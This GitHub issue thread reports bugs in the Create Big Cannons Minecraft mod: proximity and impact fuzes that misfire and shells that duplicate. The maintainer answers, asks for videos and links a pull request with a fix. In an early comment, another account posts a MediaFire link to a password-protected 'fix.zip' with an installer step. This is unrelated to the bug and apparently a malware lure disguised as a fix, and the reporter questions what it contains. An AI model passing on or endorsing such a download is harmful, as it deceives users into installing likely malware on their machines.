### ISSUE TITLE
Minecraft 1.18.2 mod version 5.5.1 Problems found

### ISSUE THREAD

**Issue by CCTWT** [Cannoneers-of-Create/CreateBigCannons#651]
1.18.2 In module version 5.5.1, the fuse cannot explode at the correct distance, for example, I set the detonation distance of the proximity fuse to 5, 6, 9 tiles and other tiles and load the grenade projectile, when the anti-aircraft shell is launched, the proximity fuse will always explode when it collides with the target, and the delayed bump fuse cannot be detonated, and the armor-piercing grenade cannot be detonated

When a shell is deflected or hit, it does not despawn, but instead duplicates one and bounces or passes through, even if the ammunition fuse is detonated

Since version 0.5.4, the fuse is no longer able to be detonated by physical creatures, whether it is a bug or something updated

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CCTWT** [comment]
> 下载 https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。

Excuse me, what is included in the document and what is the role of solving my problem

**Comment by rbasamoyai** [comment]
AP shell can only use timed fuze by default
Autocannon AP cannot be fuzed
Delayed impact fuze is interesting, send a video
Please send a video of the duplicating round issue
Please send a video of entities not triggering fuzes

**Comment by rbasamoyai** [comment]
Also, proximity fuze is a somewhat known issue, but i've largely decided that it's not the most important right now. May check on that for 5.6.0 or so

**Comment by rbasamoyai** [comment]
And finally, proximity fuze is intended to detonate when colliding with target.

**Comment by rbasamoyai** [comment]
Actually, if you're using a nightly version those may not work. Make sure you're using the version from CurseForge, so please send a modlist

**Comment by rbasamoyai** [comment]
Found the impact issue.

**Comment by rbasamoyai** [comment]
Fixed in https://github.com/Cannoneers-of-Create/CreateBigCannons/pull/653. Not in production yet.
